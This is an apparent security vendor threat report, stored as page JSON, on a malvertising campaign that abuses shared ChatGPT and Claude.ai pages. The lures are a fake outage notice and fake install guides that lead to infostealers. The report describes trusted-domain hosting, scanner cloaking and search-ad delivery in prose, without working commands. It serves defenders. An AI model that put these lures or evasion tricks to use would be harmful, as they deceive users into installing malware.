[{"data":1,"prerenderedAt":5027},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":36,"navbar-about-highlight":100,"navbar-resource-highlight":174,"blog/llmshare-malvertising-campaign":220},[4],{"enabled":5,"name":6},false,"maintenanceMode",[8],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"query":14,"data":15,"variations":20,"lastUpdated":21,"firstPublished":22,"testRatio":23,"createdBy":24,"lastUpdatedBy":25,"folders":26,"meta":27,"rev":35},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner","1c6207a5f24948ab82d4a0b17f251193","published",[],{"type":16,"url":17,"text":18,"link":19},"web-banner","https://pushsecurity.com/resources/browser-attacks-report","Get our latest report analyzing browser attack techniques in 2026",{},{},1774258294825,1742208637545,1,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],{"kind":28,"lastPreviewUrl":29,"breakpoints":30,"hasAutosaves":34},"data","",{"xsmall":31,"small":32,"medium":33},320,640,768,true,"sq5m7hrtt1",{"createdDate":37,"id":38,"name":39,"modelId":40,"published":13,"stageModifiedSincePublish":5,"query":41,"data":42,"variations":89,"lastUpdated":90,"firstPublished":91,"testRatio":23,"createdBy":92,"lastUpdatedBy":93,"folders":94,"meta":95,"rev":99},1774965361051,"fd266d0172cc47429be7ad10f48c99ad","always visible banner","0678d178ec8b41efb8a23c09dba7874d",[],{"url":29,"ctaText":43,"text":44,"blocks":45,"state":85},"ewrererw","testrfesssssssssss",[46,73],{"@type":47,"@version":48,"id":49,"component":50,"responsiveStyles":63},"@builder.io/sdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":51,"tag":51,"options":52,"isRSC":62},"TopBannerContent",{"text":53,"ctaText":54,"url":55,"mainText":56,"cta":59},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks","Save Your Spot","https://pushsecurity.com/webinar/state-of-browser-security",{"content":57,"fontSize":58},"\u003Cp>Is your stack covered? 51 browser & identity attacks, mapped.\u003C/p>","text-base",{"content":60,"fontSize":58,"url":61},"\u003Cp>\u003Cstrong style=\"font-weight:700;\">See the matrix →\u003C/strong>\u003C/p>\n","https://pushsecurity.com/resources/browser-identity-attacks-matrix/",null,{"large":64},{"display":65,"flexDirection":66,"position":67,"flexShrink":68,"boxSizing":69,"marginTop":70,"marginBottom":70,"fontSize":71,"fontWeight":72},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":74,"@type":47,"tagName":75,"properties":76,"responsiveStyles":80},"builder-pixel-6qjv2xx1o93","img",{"src":77,"aria-hidden":78,"alt":29,"role":79,"width":68,"height":68},"https://cdn.builder.io/api/v1/pixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":81},{"height":68,"width":68,"display":82,"opacity":68,"overflow":83,"pointerEvents":84},"block","hidden","none",{"deviceSize":86,"location":87},"large",{"path":29,"query":88},{},{},1778612252607,1774968080803,"ST0tXQM8slWpFrmioqKHmENB2qe2","ax7YYfD0OCeqT1Vxxv1G4FUbqVr1",[],{"kind":96,"hasLinks":5,"breakpoints":97,"lastPreviewUrl":98,"hasAutosaves":34,"hasErrors":5},"component",{"xsmall":31,"small":32,"medium":33},"https://pushsecurity.com/?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","e6y99wzygj4",[101,137],{"createdDate":102,"id":103,"name":104,"modelId":105,"published":13,"stageModifiedSincePublish":5,"query":106,"data":107,"variations":130,"lastUpdated":131,"firstPublished":132,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":133,"meta":134,"rev":136},1776247359804,"9136a8f18b3b4a6ba29b8653a99372b1","testimonial-inductive-automation","20d9eaa352304613b3d1a794b400703d",[],{"link":108,"type":109,"testimonialLink":110,"testimonial":111},{},"testimonial","/customer-stories/inductive-automation",{"@type":112,"id":113,"model":109,"value":114},"@builder.io/core:Reference","f028f2b685bb47cd8bf9e82a26dd5a79",{"query":115,"folders":116,"createdDate":117,"id":113,"name":118,"modelId":119,"published":13,"data":120,"variations":124,"lastUpdated":125,"firstPublished":126,"testRatio":23,"createdBy":92,"lastUpdatedBy":92,"meta":127,"rev":129},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"author":121,"jobTitle":122,"quote":118,"image":123},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,{"kind":28,"lastPreviewUrl":29,"breakpoints":128,"hasAutosaves":34},{"small":32,"medium":33},"ejb4610smqd",{},1776247404986,1776247404973,[],{"breakpoints":135,"kind":28,"lastPreviewUrl":29,"hasAutosaves":5},{"xsmall":31,"small":32,"medium":33},"qmd9dqqccme",{"createdDate":138,"id":139,"name":140,"modelId":105,"published":13,"meta":141,"stageModifiedSincePublish":5,"query":143,"data":144,"variations":170,"lastUpdated":171,"firstPublished":172,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":173,"rev":136},1776255761419,"05a9322735fc427db12e2740e4302300","Report: 2026 Browser Attack Techniques",{"breakpoints":142,"kind":28,"lastPreviewUrl":29,"hasAutosaves":5},{"xsmall":31,"small":32,"medium":33},[],{"testimonial":145,"link":164,"type":167,"title":140,"description":168,"image":169},{"@type":112,"id":146,"model":109,"value":147},"192acbb1f9ca4cac918c0ec435a8bae3",{"query":148,"folders":149,"createdDate":150,"id":146,"name":151,"modelId":119,"published":13,"data":152,"variations":158,"lastUpdated":159,"firstPublished":160,"testRatio":23,"createdBy":92,"lastUpdatedBy":24,"meta":161,"rev":163},[],[],1728981467463,"Push does for identity what CrowdStrike did for the endpoint",{"video":153,"jobTitle":154,"author":155,"qoute":29,"quote":156,"image":157},"https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8b30e8ca50064058bbaef0f3c6164575%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=8b30e8ca50064058bbaef0f3c6164575&alt=media&optimized=true","\u003Cp>Deputy CISO at Microsoft\u003C/p>\u003Cp>Former LinkedIn, Slack, Palantir\u003C/p>","Geoff Belknap","Push does for identity what CrowdStrike did for the endpoint.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F748f0ad0a5064a00a13f4721fcc8dea1",{},1742902158597,1728981782923,{"kind":28,"lastPreviewUrl":29,"breakpoints":162,"hasAutosaves":34},{"small":32,"medium":33},"8ke3s17c50t",{"text":165,"url":166},"Download now","/resources/browser-attacks-report","resource","Learn about the latest techniques being used in the wild.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9",{},1776255810913,1776255810900,[],[175,198],{"createdDate":176,"id":177,"name":140,"modelId":178,"published":13,"meta":179,"stageModifiedSincePublish":5,"query":181,"data":182,"variations":193,"lastUpdated":194,"firstPublished":195,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":196,"rev":197},1776256900280,"1f429607996e4e5fae8fe3f9b9610e55","4829faa81e7c4ee8bd2d000e160e8d3c",{"breakpoints":180,"kind":28,"lastPreviewUrl":29,"hasAutosaves":5},{"xsmall":31,"small":32,"medium":33},[],{"testimonial":183,"link":192,"type":167,"title":140,"description":168,"image":169},{"@type":112,"id":146,"model":109,"value":184},{"query":185,"folders":186,"createdDate":150,"id":146,"name":151,"modelId":119,"published":13,"data":187,"variations":188,"lastUpdated":159,"firstPublished":160,"testRatio":23,"createdBy":92,"lastUpdatedBy":24,"meta":189,"rev":191},[],[],{"video":153,"jobTitle":154,"author":155,"qoute":29,"quote":156,"image":157},{},{"kind":28,"lastPreviewUrl":29,"breakpoints":190,"hasAutosaves":34},{"small":32,"medium":33},"r2hfsxeegak",{"text":165,"url":166},{},1776256937553,1776256937540,[],"ruwk571l1sp",{"createdDate":199,"id":200,"name":201,"modelId":178,"published":13,"stageModifiedSincePublish":5,"query":202,"data":203,"variations":214,"lastUpdated":215,"firstPublished":216,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":217,"meta":218,"rev":197},1776256949234,"ce043785b71b4ece98eac811ecf4ba10","inductive-automation",[],{"link":204,"type":109,"testimonial":205,"testimonialLink":110},{},{"@type":112,"id":113,"model":109,"value":206},{"query":207,"folders":208,"createdDate":117,"id":113,"name":118,"modelId":119,"published":13,"data":209,"variations":210,"lastUpdated":125,"firstPublished":126,"testRatio":23,"createdBy":92,"lastUpdatedBy":92,"meta":211,"rev":213},[],[],{"author":121,"jobTitle":122,"quote":118,"image":123},{},{"kind":28,"lastPreviewUrl":29,"breakpoints":212,"hasAutosaves":34},{"small":32,"medium":33},"ifd0kiul0a8",{},1776256974140,1776256974130,[],{"breakpoints":219,"kind":28,"lastPreviewUrl":29,"hasAutosaves":5},{"xsmall":31,"small":32,"medium":33},{"id":221,"title":222,"authorsCollection":223,"content":231,"extension":1173,"featured":5,"hashTags":62,"meta":1174,"metaTitle":1175,"ogImage":62,"publishedDate":1176,"relatedBlogPostsCollection":1177,"slug":5003,"stem":5004,"subtitle":62,"summary":5005,"synopsis":5016,"sys":5017,"tagsCollection":5020,"__hash__":5026},"blog/blog/llmshare-malvertising-campaign.json","LLMShare: how attackers are turning AI chatbot pages into malware delivery platforms",{"items":224},[225],{"fullName":226,"firstName":227,"jobTitle":228,"profilePicture":229},"Keanu Maharaj","Keanu","Senior Security Researcher",{"url":230},"https://images.ctfassets.net/y1cdw1ablpvd/VCGOm62jiocjwngWTh32U/e9a30637b1c76bf988d2fec90f5b6c36/1689361049351_1.png",{"json":232,"links":1045},{"nodeType":233,"data":234,"content":235},"document",{},[236,245,252,284,291,300,306,319,323,332,349,356,362,369,376,382,385,393,400,406,412,419,426,445,451,454,462,480,486,493,496,504,511,518,524,530,579,586,589,597,604,612,655,662,693,700,743,750,753,761,780,787,795,811,818,837,844,847,854,861,879,882,890,909,916,1039],{"nodeType":237,"data":238,"content":239},"paragraph",{},[240],{"nodeType":241,"value":242,"marks":243,"data":244},"text","Shared conversations on AI chatbot platforms have become the latest delivery mechanism for malware campaigns targeting macOS and Windows users. Attackers create content on platforms like ChatGPT and Claude that appears to offer installation guidance or service updates, then drive traffic to it via search engine results in the form of malvertising and SEO poisoning.  ",[],{},{"nodeType":237,"data":246,"content":247},{},[248],{"nodeType":241,"value":249,"marks":250,"data":251},"The content lives on chatgpt.com or claude.ai — domains that users and security tools trust implicitly — so the attack bypasses URL reputation checks before the victim even reaches the malicious payload.",[],{},{"nodeType":237,"data":253,"content":254},{},[255,259,268,272,280],{"nodeType":241,"value":256,"marks":257,"data":258},"Several variants of this technique have been",[],{},{"nodeType":260,"data":261,"content":263},"hyperlink",{"uri":262},"https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-claudeai-chats-to-push-mac-malware/",[264],{"nodeType":241,"value":265,"marks":266,"data":267}," reported over the past few months",[],{},{"nodeType":241,"value":269,"marks":270,"data":271},". The earliest examples used shared Claude.ai conversations disguised as installation guides — complete with fake \"Apple Support\" attribution — that walked users through opening a terminal and pasting a curl command that downloaded and executed an infostealer.",[],{},{"nodeType":260,"data":273,"content":275},{"uri":274},"https://www.kaspersky.com/blog/share-chatgpt-chat-clickfix-macos-amos-infostealer/54928/",[276],{"nodeType":241,"value":277,"marks":278,"data":279}," Kaspersky documented a parallel campaign",[],{},{"nodeType":241,"value":281,"marks":282,"data":283}," using shared ChatGPT conversations to deliver the AMOS (Atomic macOS Stealer) via the same paste-this-command social engineering pattern. ",[],{},{"nodeType":237,"data":285,"content":286},{},[287],{"nodeType":241,"value":288,"marks":289,"data":290},"Push has detected a new variant that goes beyond the previously reported technique of embedding terminal commands in shared conversations: the attacker has used ChatGPT's code rendering feature to build a fully designed fake page that mimics a ChatGPT service disruption, redirecting victims to a convincing clone of ChatGPT's download page that delivers a malicious executable. ",[],{},{"nodeType":292,"data":293,"content":299},"embedded-entry-block",{"target":294},{"sys":295},{"id":296,"type":297,"linkType":298},"5lz9zt223pecGvdaqdvSTQ","Link","Entry",[],{"nodeType":292,"data":301,"content":305},{"target":302},{"sys":303},{"id":304,"type":297,"linkType":298},"51GomAj3VOjnbmgd1DWYu0",[],{"nodeType":237,"data":307,"content":308},{},[309,315],{"nodeType":241,"value":310,"marks":311,"data":314},"This is a live campaign which is still generating detections across our customer base at the time of writing. ",[312],{"type":313},"bold",{},{"nodeType":241,"value":316,"marks":317,"data":318},"Push customers are already protected and do not need to take further action. The malicious page URLs can be found at the end of this report but are not exhaustive and are liable to change. ",[],{},{"nodeType":320,"data":321,"content":322},"hr",{},[],{"nodeType":324,"data":325,"content":326},"heading-1",{},[327],{"nodeType":241,"value":328,"marks":329,"data":331},"A fake page, not a fake conversation",[330],{"type":313},{},{"nodeType":237,"data":333,"content":334},{},[335,339,345],{"nodeType":241,"value":336,"marks":337,"data":338},"Previously reported variants relied on shared ",[],{},{"nodeType":241,"value":340,"marks":341,"data":344},"conversations",[342],{"type":343},"italic",{},{"nodeType":241,"value":346,"marks":347,"data":348}," — the attacker created a chat that contained step-by-step instructions for the victim to follow, typically involving pasting a command into their terminal. The social engineering was conversational: the \"AI assistant\" appeared to be helpfully guiding the user through an installation process.",[],{},{"nodeType":237,"data":350,"content":351},{},[352],{"nodeType":241,"value":353,"marks":354,"data":355},"But now, rather than a shared conversation, the attacker has used ChatGPT's code rendering feature to create a fully designed, self-contained web page hosted at a chatgpt.com/s/ URL. It renders as what appears to be a ChatGPT service disruption notice:",[],{},{"nodeType":292,"data":357,"content":361},{"target":358},{"sys":359},{"id":360,"type":297,"linkType":298},"1O9gyQab81SnbxhQp2aa5Z",[],{"nodeType":237,"data":363,"content":364},{},[365],{"nodeType":241,"value":366,"marks":367,"data":368},"A professional-looking error message reads: \"We're experiencing high traffic right now. Our website is temporarily unavailable due to a large number of users. Download our desktop app to continue.\" A prominent download button sits below.",[],{},{"nodeType":237,"data":370,"content":371},{},[372],{"nodeType":241,"value":373,"marks":374,"data":375},"The \"Show code\" toggle at the top of the page reveals what's actually happening — the entire thing is custom HTML and CSS, authored to mimic a ChatGPT system notice, rendered using ChatGPT's code output feature. A web page inside a web page, hosted on a domain that every URL reputation system in the world considers safe.",[],{},{"nodeType":292,"data":377,"content":381},{"target":378},{"sys":379},{"id":380,"type":297,"linkType":298},"4kQTfxB3aVH9W9BeYOuljP",[],{"nodeType":320,"data":383,"content":384},{},[],{"nodeType":324,"data":386,"content":387},{},[388],{"nodeType":241,"value":389,"marks":390,"data":392},"The download page",[391],{"type":313},{},{"nodeType":237,"data":394,"content":395},{},[396],{"nodeType":241,"value":397,"marks":398,"data":399},"Clicking the download button redirects the user to openew[.]app, which presents a convincing clone of ChatGPT's official desktop application download page — complete with OpenAI branding, macOS and Windows download buttons, a Chrome extension link, and a mobile download section.",[],{},{"nodeType":292,"data":401,"content":405},{"target":402},{"sys":403},{"id":404,"type":297,"linkType":298},"4MdFc4OB37ZihTGx506QJ6",[],{"nodeType":292,"data":407,"content":411},{"target":408},{"sys":409},{"id":410,"type":297,"linkType":298},"LaPUy0zpIeY8s4PF2wkat",[],{"nodeType":237,"data":413,"content":414},{},[415],{"nodeType":241,"value":416,"marks":417,"data":418},"The site also displays differently depending on who visits it. When Push researchers examined the URL via URLScan, the scanner was redirected to a different page entirely — a generic AR/VR company website with no obvious connection to ChatGPT. ",[],{},{"nodeType":237,"data":420,"content":421},{},[422],{"nodeType":241,"value":423,"marks":424,"data":425},"Real users in a browser see the fake download page; automated scanners and bots see something benign. This kind of conditional rendering is a well-established evasion technique in the malvertising ecosystem, and it makes the malicious infrastructure harder for security teams and threat intelligence services to identify and analyze.",[],{},{"nodeType":237,"data":427,"content":428},{},[429,433,441],{"nodeType":241,"value":430,"marks":431,"data":432},"The downloaded executable poses as \"ChatGPT for Desktop\" and is",[],{},{"nodeType":260,"data":434,"content":436},{"uri":435},"https://www.virustotal.com/gui/file/de8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78",[437],{"nodeType":241,"value":438,"marks":439,"data":440}," flagged on VirusTotal",[],{},{"nodeType":241,"value":442,"marks":443,"data":444},".",[],{},{"nodeType":292,"data":446,"content":450},{"target":447},{"sys":448},{"id":449,"type":297,"linkType":298},"3FSbwoFJYQrcyo9uMsQIWI",[],{"nodeType":320,"data":452,"content":453},{},[],{"nodeType":324,"data":455,"content":456},{},[457],{"nodeType":241,"value":458,"marks":459,"data":461},"The Claude variant: same campaign, different platform",[460],{"type":313},{},{"nodeType":237,"data":463,"content":464},{},[465,469,476],{"nodeType":241,"value":466,"marks":467,"data":468},"Alongside the ChatGPT rendered-page variant, Push has also detected the previously reported style of attack using shared Claude.ai conversations. These follow the pattern documented by",[],{},{"nodeType":260,"data":470,"content":471},{"uri":262},[472],{"nodeType":241,"value":473,"marks":474,"data":475}," BleepingComputer",[],{},{"nodeType":241,"value":477,"marks":478,"data":479},": a shared chat disguised as a \"Claude Code on Mac\" installation guide, attributed to \"Apple Support,\" containing a curl command that downloads and executes malware.",[],{},{"nodeType":292,"data":481,"content":485},{"target":482},{"sys":483},{"id":484,"type":297,"linkType":298},"5sWayuTsVdiLSLoS4sv2Vc",[],{"nodeType":237,"data":487,"content":488},{},[489],{"nodeType":241,"value":490,"marks":491,"data":492},"The fact that both the ChatGPT and Claude variants are appearing in Push customer environments suggests a campaign — or at least a shared playbook — that is actively experimenting with different platforms and different social engineering approaches to find what converts best.",[],{},{"nodeType":320,"data":494,"content":495},{},[],{"nodeType":324,"data":497,"content":498},{},[499],{"nodeType":241,"value":500,"marks":501,"data":503},"Malvertising remains one of the top phishing delivery channels",[502],{"type":313},{},{"nodeType":237,"data":505,"content":506},{},[507],{"nodeType":241,"value":508,"marks":509,"data":510},"Push has detected this variant across multiple customer environments, with users arriving at these shared chat URLs after searching for terms including \"chatgpt,\" \"chatgpt free,\" \"chat gpt,\" and common typos like \"chatgo,\" \"chatgot,\" and \"cvhatgpt.\" ",[],{},{"nodeType":237,"data":512,"content":513},{},[514],{"nodeType":241,"value":515,"marks":516,"data":517},"You can see an example of this below: it's incredibly convincing, and uses the real ChatGPT domain — so even users that are paying attention are liable to fall for it. ",[],{},{"nodeType":292,"data":519,"content":523},{"target":520},{"sys":521},{"id":522,"type":297,"linkType":298},"1GYWOyHpZT1rdTm6IGOKu8",[],{"nodeType":292,"data":525,"content":529},{"target":526},{"sys":527},{"id":528,"type":297,"linkType":298},"4HpFJRAZH2lbygaEk2xOnN",[],{"nodeType":237,"data":531,"content":532},{},[533,537,545,549,557,561,575],{"nodeType":241,"value":534,"marks":535,"data":536},"This fits a pattern Push has tracked extensively.",[],{},{"nodeType":260,"data":538,"content":540},{"uri":539},"https://pushsecurity.com/blog/verizon-dbir-2026-review/",[541],{"nodeType":241,"value":542,"marks":543,"data":544}," Search-based delivery is now the dominant channel for malware distribution",[],{},{"nodeType":241,"value":546,"marks":547,"data":548}," — our own data shows that ClickFix attacks are reached via search results rather than email in 4 of 5 cases, and Push's own research into",[],{},{"nodeType":260,"data":550,"content":552},{"uri":551},"https://pushsecurity.com/blog/analysing-a-sophisticated-google-malvertising-attack/",[553],{"nodeType":241,"value":554,"marks":555,"data":556}," malvertising campaigns impersonating brands like TradingView",[],{},{"nodeType":241,"value":558,"marks":559,"data":560}," and",[],{},{"nodeType":260,"data":562,"content":564},{"uri":563},"https://pushsecurity.com/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs/",[565,569],{"nodeType":241,"value":566,"marks":567,"data":568}," ",[],{},{"nodeType":241,"value":570,"marks":571,"data":574},"Ahrefs",[572],{"type":573},"underline",{},{"nodeType":241,"value":576,"marks":577,"data":578}," has demonstrated how effectively search ads can funnel victims to malicious pages. ",[],{},{"nodeType":237,"data":580,"content":581},{},[582],{"nodeType":241,"value":583,"marks":584,"data":585},"The shared-chat technique adds a new dimension: the destination URL itself is genuine (chatgpt.com, claude.ai), which means even a cautious user who checks the URL before clicking will see nothing suspicious.",[],{},{"nodeType":320,"data":587,"content":588},{},[],{"nodeType":324,"data":590,"content":591},{},[592],{"nodeType":241,"value":593,"marks":594,"data":596},"Legitimate platform abuse is everywhere",[595],{"type":313},{},{"nodeType":237,"data":598,"content":599},{},[600],{"nodeType":241,"value":601,"marks":602,"data":603},"This is one example of a much broader pattern that has become one of the defining characteristics of the 2026 threat landscape: attackers systematically abusing legitimate platforms as attack infrastructure. The scale and variety of this abuse in recent months alone is striking, and it spans every stage of the phishing chain.",[],{},{"nodeType":605,"data":606,"content":607},"heading-2",{},[608],{"nodeType":241,"value":609,"marks":610,"data":611},"Legit platform abuse for delivery",[],{},{"nodeType":237,"data":613,"content":614},{},[615,619,627,631,639,643,651],{"nodeType":241,"value":616,"marks":617,"data":618},"On the delivery side, attackers have been",[],{},{"nodeType":260,"data":620,"content":622},{"uri":621},"https://www.bleepingcomputer.com/news/security/amazon-ses-increasingly-abused-in-phishing-to-evade-detection/",[623],{"nodeType":241,"value":624,"marks":625,"data":626}," weaponizing stolen AWS credentials to send phishing through Amazon SES",[],{},{"nodeType":241,"value":628,"marks":629,"data":630}," that passes SPF, DKIM, and DMARC validation because SES is a legitimate Amazon service. A Vietnamese operation dubbed",[],{},{"nodeType":260,"data":632,"content":634},{"uri":633},"https://thehackernews.com/2026/05/30000-facebook-accounts-hacked-via.html",[635],{"nodeType":241,"value":636,"marks":637,"data":638}," AccountDumpling used Google AppSheet's built-in email capability",[],{},{"nodeType":241,"value":640,"marks":641,"data":642}," as a phishing relay to harvest 30,000 Facebook credentials.",[],{},{"nodeType":260,"data":644,"content":646},{"uri":645},"https://techcrunch.com/2026/05/21/scammers-are-abusing-an-internal-microsoft-account-to-send-spam/",[647],{"nodeType":241,"value":648,"marks":649,"data":650}," Scammers exploited Microsoft's own internal notification pipeline",[],{},{"nodeType":241,"value":652,"marks":653,"data":654}," — sending phishing from the same msonlineservicesteam@microsoftonline.com address that delivers legitimate 2FA codes — with Spamhaus confirming months of ongoing abuse.",[],{},{"nodeType":605,"data":656,"content":657},{},[658],{"nodeType":241,"value":659,"marks":660,"data":661},"Legit platform abuse for hosting",[],{},{"nodeType":237,"data":663,"content":664},{},[665,669,677,681,689],{"nodeType":241,"value":666,"marks":667,"data":668},"For hosting, the platforms being abused read like a who's who of modern web infrastructure.",[],{},{"nodeType":260,"data":670,"content":672},{"uri":671},"https://www.securityweek.com/over-500-organizations-hit-in-years-long-phishing-campaign/",[673],{"nodeType":241,"value":674,"marks":675,"data":676}," Operation HookedWing ran for four years",[],{},{"nodeType":241,"value":678,"marks":679,"data":680}," on GitHub Pages and Vercel, compromising 500+ organizations across more than 100 GitHub Pages domains before anyone documented it publicly. Cofense has separately",[],{},{"nodeType":260,"data":682,"content":684},{"uri":683},"https://cofense.com/blog/steal-smarter-not-harder-malicious-use-of-vercel-for-credential-phishing/",[685],{"nodeType":241,"value":686,"marks":687,"data":688}," documented the growing abuse of Vercel",[],{},{"nodeType":241,"value":690,"marks":691,"data":692}," for credential phishing hosting. Pixm's Q1 2026 phishing report tracked over 100 unique Azure Blob Storage subdomain variants hosting phishing content that carried Microsoft's own domain reputation, alongside abuse of Cloudflare CDN, Cloudflare Workers, Cloudflare R2, Backblaze B2, and Supabase. ",[],{},{"nodeType":605,"data":694,"content":695},{},[696],{"nodeType":241,"value":697,"marks":698,"data":699},"Abuse of compromised websites that are otherwise legit",[],{},{"nodeType":237,"data":701,"content":702},{},[703,707,715,719,727,731,739],{"nodeType":241,"value":704,"marks":705,"data":706},"Compromised legitimate sites are also being repurposed at scale. A mass exploitation of a",[],{},{"nodeType":260,"data":708,"content":710},{"uri":709},"https://www.bleepingcomputer.com/news/security/ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/",[711],{"nodeType":241,"value":712,"marks":713,"data":714}," Ghost CMS vulnerability planted ClickFix pages across 700+ websites",[],{},{"nodeType":241,"value":716,"marks":717,"data":718}," including Harvard, Oxford, and DuckDuckGo subdomains. Microsoft recently documented a campaign where",[],{},{"nodeType":260,"data":720,"content":722},{"uri":721},"https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",[723],{"nodeType":241,"value":724,"marks":725,"data":726}," SEO poisoning was combined with AI chatbot recommendation manipulation",[],{},{"nodeType":241,"value":728,"marks":729,"data":730}," to deliver GPU mining malware — extending the poisoning from traditional search results into AI-generated software recommendations. And",[],{},{"nodeType":260,"data":732,"content":734},{"uri":733},"https://www.helpnetsecurity.com/2026/05/27/deno-rat-malware-fake-chatgpt-claude-installers/",[735],{"nodeType":241,"value":736,"marks":737,"data":738}," fake ChatGPT and Claude installers on GitHub and SourceForge",[],{},{"nodeType":241,"value":740,"marks":741,"data":742}," have been delivering the DinDoor backdoor and a Deno-based RAT via repositories that mimic legitimate developer tool distributions.",[],{},{"nodeType":237,"data":744,"content":745},{},[746],{"nodeType":241,"value":747,"marks":748,"data":749},"The structural problem is that every one of these platforms is genuinely legitimate, and the security controls that evaluate them — domain reputation, email authentication, URL categorization — confirm them as trusted because they are trusted. This attack extends this pattern into new territory by weaponizing the content-sharing features of AI chatbot platforms specifically, but the underlying principles are the same. ",[],{},{"nodeType":320,"data":751,"content":752},{},[],{"nodeType":324,"data":754,"content":755},{},[756],{"nodeType":241,"value":757,"marks":758,"data":760},"Impact analysis",[759],{"type":313},{},{"nodeType":237,"data":762,"content":763},{},[764,768,776],{"nodeType":241,"value":765,"marks":766,"data":767},"Shared-chat malware delivery exploits a structural property of AI platforms that traditional security controls aren't designed to handle. Domain reputation, URL categorization, and safe browsing databases all treat chatgpt.com and claude.ai as trusted — because they are. Using these trusted pages to link off to further convincing-looking pages hosting malware allows the attacker to run campaigns that blend in, as well as rotate the phishing delivery pages later in the chain should they ever be flagged, allowing the campaign to continue without interruption (a well known ",[],{},{"nodeType":260,"data":769,"content":771},{"uri":770},"https://phishing-techniques.pushsecurity.com/",[772],{"nodeType":241,"value":773,"marks":774,"data":775},"detection evasion technique",[],{},{"nodeType":241,"value":777,"marks":778,"data":779},"). ",[],{},{"nodeType":237,"data":781,"content":782},{},[783],{"nodeType":241,"value":784,"marks":785,"data":786},"What makes the rendered-page variant particularly concerning is that it eliminates the most obvious red flag in the earlier attacks. The Claude.ai conversation variants required the victim to recognize that a shared chat instructing them to paste terminal commands might be suspicious — a tall order for many users, but at least the attack surface was visible. The rendered-page variant shows nothing that looks like an attack. It presents what appears to be a routine service disruption with a reasonable call to action: download the desktop app to continue using ChatGPT. ",[],{},{"nodeType":605,"data":788,"content":789},{},[790],{"nodeType":241,"value":791,"marks":792,"data":794},"How Push detected the attack",[793],{"type":313},{},{"nodeType":237,"data":796,"content":797},{},[798,802,807],{"nodeType":241,"value":799,"marks":800,"data":801},"We've aligned our detection logic for this technique under the name ",[],{},{"nodeType":241,"value":803,"marks":804,"data":806},"LLMShare",[805],{"type":313},{},{"nodeType":241,"value":808,"marks":809,"data":810}," — a technique-level detection that covers shared content abuse across LLM platforms, not tied to any single campaign or set of IOCs. ",[],{},{"nodeType":237,"data":812,"content":813},{},[814],{"nodeType":241,"value":815,"marks":816,"data":817},"Because Push sees the full context of how a user arrived at a page and what that page does once it renders, we can identify LLMShare attacks regardless of which AI platform is being abused or what social engineering wrapper the attacker has chosen. ",[],{},{"nodeType":237,"data":819,"content":820},{},[821,825,833],{"nodeType":241,"value":822,"marks":823,"data":824},"When we identified the initial instances of this campaign, we used our",[],{},{"nodeType":260,"data":826,"content":828},{"uri":827},"https://pushsecurity.com/blog/can-ai-replace-a-threat-researcher-what-we-learned-building-an-agentic-threat-hunting-pipeline/",[829],{"nodeType":241,"value":830,"marks":831,"data":832}," agentic threat hunting pipeline",[],{},{"nodeType":241,"value":834,"marks":835,"data":836}," to hunt for additional examples across our customer telemetry, develop the LLMShare detection, and rapidly deploy it to customers. Push blocks users from interacting with the page before any malicious activity can occur. ",[],{},{"nodeType":237,"data":838,"content":839},{},[840],{"nodeType":241,"value":841,"marks":842,"data":843},"Push customers do not need to take any further action.",[],{},{"nodeType":320,"data":845,"content":846},{},[],{"nodeType":237,"data":848,"content":849},{},[850],{"nodeType":241,"value":851,"marks":852,"data":853},"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.",[],{},{"nodeType":237,"data":855,"content":856},{},[857],{"nodeType":241,"value":858,"marks":859,"data":860},"Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't 